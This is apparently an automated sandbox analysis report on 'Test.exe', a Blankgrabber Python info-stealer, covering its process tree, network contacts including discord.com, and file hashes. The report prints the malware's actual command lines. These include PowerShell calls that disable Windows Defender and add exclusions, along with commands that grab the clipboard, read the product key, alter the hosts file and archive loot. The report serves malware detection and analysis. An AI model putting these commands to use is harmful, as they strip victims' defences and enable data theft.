Analysis Overview
SHA256
45f1bde758b218562cc91da3dd5a14ab0974a9d12c345dd522f9696a1ae901ca
Threat Level: Known bad
The file Test.exe was found to be: Known bad.
Malicious Activity Summary
A stealer written in Python and packaged with Pyinstaller
Blankgrabber family
Drops file in Drivers directory
Command and Scripting Interpreter: PowerShell
UPX packed file
Executes dropped EXE
Loads dropped DLL
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Enumerates physical storage devices
Enumerates processes with tasklist
Detects videocard installed
Views/modifies file attributes
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Gathers system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-03 10:16
Signatures
A stealer written in Python and packaged with Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blankgrabber family
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-03 10:16
Reported
2024-06-03 10:19
Platform
win7-20240221-en
Max time kernel
117s
Max time network
122s
Command Line
Signatures
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2076 wrote to memory of 1296 | N/A | C:\Users\Admin\AppData\Local\Temp\Test.exe | C:\Users\Admin\AppData\Local\Temp\Test.exe |
| PID 2076 wrote to memory of 1296 | N/A | C:\Users\Admin\AppData\Local\Temp\Test.exe | C:\Users\Admin\AppData\Local\Temp\Test.exe |
| PID 2076 wrote to memory of 1296 | N/A | C:\Users\Admin\AppData\Local\Temp\Test.exe | C:\Users\Admin\AppData\Local\Temp\Test.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\Test.exe
"C:\Users\Admin\AppData\Local\Temp\Test.exe"
C:\Users\Admin\AppData\Local\Temp\Test.exe
"C:\Users\Admin\AppData\Local\Temp\Test.exe"
Network
Files
C:\Users\Admin\AppData\Local\Temp\_MEI20762\python311.dll
| MD5 | ccdbd8027f165575a66245f8e9d140de |
| SHA1 | d91786422ce1f1ad35c528d1c4cd28b753a81550 |
| SHA256 | 503cd34daed4f6d320731b368bbd940dbac1ff7003321a47d81d81d199cca971 |
| SHA512 | 870b54e4468db682b669887aeef1ffe496f3f69b219bda2405ac502d2dcd67b6542db6190ea6774abf1db5a7db429ce8f6d2fc5e88363569f15cf4df78da2311 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-03 10:16
Reported
2024-06-03 10:19
Platform
win10v2004-20240426-en
Max time kernel
148s
Max time network
150s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\attrib.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\attrib.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\_MEI49922\rar.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Test.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Test.exe
"C:\Users\Admin\AppData\Local\Temp\Test.exe"
C:\Users\Admin\AppData\Local\Temp\Test.exe
"C:\Users\Admin\AppData\Local\Temp\Test.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Test.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Test.exe'
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\attrib.exe
attrib -r C:\Windows\System32\drivers\etc\hosts
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\attrib.exe
attrib +r C:\Windows\System32\drivers\etc\hosts
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\x5xeol1u\x5xeol1u.cmdline"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6A14.tmp" "c:\Users\Admin\AppData\Local\Temp\x5xeol1u\CSC93BD618D8B734D548C40C38081E279FF.TMP"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
C:\Windows\system32\getmac.exe
getmac
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI49922\rar.exe a -r -hp"1234" "C:\Users\Admin\AppData\Local\Temp\geNAr.zip" *"
C:\Users\Admin\AppData\Local\Temp\_MEI49922\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI49922\rar.exe a -r -hp"1234" "C:\Users\Admin\AppData\Local\Temp\geNAr.zip" *
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | blank-4bg2h.in | udp |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | 227.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 232.136.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.16.208.104.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\_MEI49922\python311.dll
| MD5 | ccdbd8027f165575a66245f8e9d140de |
| SHA1 | d91786422ce1f1ad35c528d1c4cd28b753a81550 |
| SHA256 | 503cd34daed4f6d320731b368bbd940dbac1ff7003321a47d81d81d199cca971 |
| SHA512 | 870b54e4468db682b669887aeef1ffe496f3f69b219bda2405ac502d2dcd67b6542db6190ea6774abf1db5a7db429ce8f6d2fc5e88363569f15cf4df78da2311 |
C:\Users\Admin\AppData\Local\Temp\_MEI49922\VCRUNTIME140.dll
| MD5 | be8dbe2dc77ebe7f88f910c61aec691a |
| SHA1 | a19f08bb2b1c1de5bb61daf9f2304531321e0e40 |
| SHA256 | 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83 |
| SHA512 | 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655 |
C:\Users\Admin\AppData\Local\Temp\_MEI49922\base_library.zip
| MD5 | 4b011f052728ae5007f9ec4e97a4f625 |
| SHA1 | 9d940561f08104618ec9e901a9cd0cd13e8b355d |
| SHA256 | c88cd8549debc046a980b0be3bf27956ae72dcdcf1a448e55892194752c570e6 |
| SHA512 | be405d80d78a188a563086809c372c44bcd1ccab5a472d50714f559559795a1df49437c1712e15eb0403917c7f6cfaf872d6bb0c8e4dd67a512c2c4a5ae93055 |
C:\Users\Admin\AppData\Local\Temp\_MEI49922\_ctypes.pyd
| MD5 | 343e1a85da03e0f80137719d48babc0f |
| SHA1 | 0702ba134b21881737585f40a5ddc9be788bab52 |
| SHA256 | 7b68a4ba895d7bf605a4571d093ae3190eac5e813a9eb131285ae74161d6d664 |
| SHA512 | 1b29efad26c0a536352bf8bb176a7fe9294e616cafb844c6d861561e59fbda35e1f7c510b42e8ed375561a5e1d2392b42f6021acc43133a27ae4b7006e465ba8 |
C:\Users\Admin\AppData\Local\Temp\_MEI49922\libffi-8.dll
| MD5 | 08b000c3d990bc018fcb91a1e175e06e |
| SHA1 | bd0ce09bb3414d11c91316113c2becfff0862d0d |
| SHA256 | 135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece |
| SHA512 | 8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf |
C:\Users\Admin\AppData\Local\Temp\_MEI49922\_ssl.pyd
| MD5 | e5f6bff7a8c2cd5cb89f40376dad6797 |
| SHA1 | b854fd43b46a4e3390d5f9610004010e273d7f5f |
| SHA256 | 0f8493de58e70f3520e21e05d78cfd6a7fcde70d277e1874183e2a8c1d3fb7d5 |
| SHA512 | 5b7e6421ad39a61dabd498bd0f7aa959a781bc82954dd1a74858edfea43be8e3afe3d0cacb272fa69dc897374e91ea7c0570161cda7cc57e878b288045ee98d9 |
C:\Users\Admin\AppData\Local\Temp\_MEI49922\_sqlite3.pyd
| MD5 | a9d2c3cf00431d2b8c8432e8fb1feefd |
| SHA1 | 1c3e2fe22e10e1e9c320c1e6f567850fd22c710c |
| SHA256 | aa0611c451b897d27dd16236ce723303199c6eacfc82314f342c7338b89009f3 |
| SHA512 | 1b5ada1dac2ab76f49de5c8e74542e190455551dfd1dfe45c9ccc3edb34276635613dbcfadd1e5f4383a0d851c6656a7840c327f64b50b234f8fdd469a02ef73 |
C:\Users\Admin\AppData\Local\Temp\_MEI49922\_socket.pyd
| MD5 | 2957b2d82521ed0198851d12ed567746 |
| SHA1 | ad5fd781490ee9b1ad2dd03e74f0779fb5f9afc2 |
| SHA256 | 1e97a62f4f768fa75bac47bba09928d79b74d84711b6488905f8429cd46f94a2 |
| SHA512 | b557cf3fe6c0cc188c6acc0a43b44f82fcf3a6454f6ed7a066d75da21bb11e08cfa180699528c39b0075f4e79b0199bb05e57526e8617036411815ab9f406d35 |
C:\Users\Admin\AppData\Local\Temp\_MEI49922\_queue.pyd
| MD5 | 0e5997263833ce8ce8a6a0ec35982a37 |
| SHA1 | 96372353f71aaa56b32030bb5f5dd5c29b854d50 |
| SHA256 | 0489700a866dddfa50d6ee289f7cca22c6dced9fa96541b45a04dc2ffb97122e |
| SHA512 | a00a667cc1bbd40befe747fbbc10f130dc5d03b777cbe244080498e75a952c17d80db86aa35f37b14640ed20ef21188ea99f3945553538e61797b575297c873f |
C:\Users\Admin\AppData\Local\Temp\_MEI49922\_lzma.pyd
| MD5 | 932147ac29c593eb9e5244b67cf389bb |
| SHA1 | 3584ff40ab9aac1e557a6a6009d10f6835052cde |
| SHA256 | bde9bccb972d356b8de2dc49a4d21d1b2f9711bbc53c9b9f678b66f16ca4c5d3 |
| SHA512 | 6e36b8d8c6dc57a0871f0087757749c843ee12800a451185856a959160f860402aa16821c4ea659ea43be2c44fcdb4df5c0f889c21440aceb9ee1bc57373263c |
C:\Users\Admin\AppData\Local\Temp\_MEI49922\_hashlib.pyd
| MD5 | d71df4f6e94bea5e57c267395ad2a172 |
| SHA1 | 5c82bca6f2ce00c80e6fe885a651b404052ac7d0 |
| SHA256 | 8bc92b5a6c1e1c613027c8f639cd8f9f1218fc4f7d5526cfcb9c517a2e9e14c2 |
| SHA512 | e794d9ae16f9a2b0c52e0f9c390d967ba3287523190d98279254126db907ba0e5e87e5525560273798cc9f32640c33c8d9f825ff473524d91b664fe91e125549 |
C:\Users\Admin\AppData\Local\Temp\_MEI49922\_decimal.pyd
| MD5 | 8b623d42698bf8a7602243b4be1f775d |
| SHA1 | f9116f4786b5687a03c75d960150726843e1bc25 |
| SHA256 | 7c2f0a65e38179170dc69e1958e7d21e552eca46fcf62bbb842b4f951a86156c |
| SHA512 | aa1b497629d7e57b960e4b0ab1ea3c28148e2d8ebd02905e89b365f508b945a49aacfbd032792101668a32f8666f8c4ef738de7562979b7cf89e0211614fa21a |
C:\Users\Admin\AppData\Local\Temp\_MEI49922\_bz2.pyd
| MD5 | 3bd0dd2ed98fca486ec23c42a12978a8 |
| SHA1 | 63df559f4f1a96eb84028dc06eaeb0ef43551acd |
| SHA256 | 6beb733f2e27d25617d880559299fbebd6a9dac51d6a9d0ab14ae6df9877da07 |
| SHA512 | 9ffa7da0e57d98b8fd6b71bc5984118ea0b23bf11ea3f377dabb45b42f2c8757216bc38ddd05b50c0bc1c69c23754319cef9ffc662d4199f7c7e038a0fb18254 |
C:\Users\Admin\AppData\Local\Temp\_MEI49922\unicodedata.pyd
| MD5 | bc28491251d94984c8555ed959544c11 |
| SHA1 | 964336b8c045bf8bb1f4d12de122cfc764df6a46 |
| SHA256 | f308681ef9c4bb4ea6adae93939466df1b51842554758cb2d003131d7558edd4 |
| SHA512 | 042d072d5f73fe3cd59394fc59436167c40b4e0cf7909afcad1968e0980b726845f09bf23b4455176b12083a91141474e9e0b7d8475afb0e3de8e1e4dbad7ec0 |
C:\Users\Admin\AppData\Local\Temp\_MEI49922\sqlite3.dll
| MD5 | 74b347668b4853771feb47c24e7ec99b |
| SHA1 | 21bd9ca6032f0739914429c1db3777808e4806b0 |
| SHA256 | 5913eb3f3d237632c2f0d6e32ca3e993a50b348033bb6e0da8d8139d44935f9e |
| SHA512 | 463d8864ada5f21a70f8db15961a680b00ee040a41ea660432d53d0ee3ccd292e6c11c4ec52d1d848a7d846ad3caf923cbc38535754d65bbe190e095f5acb8c3 |
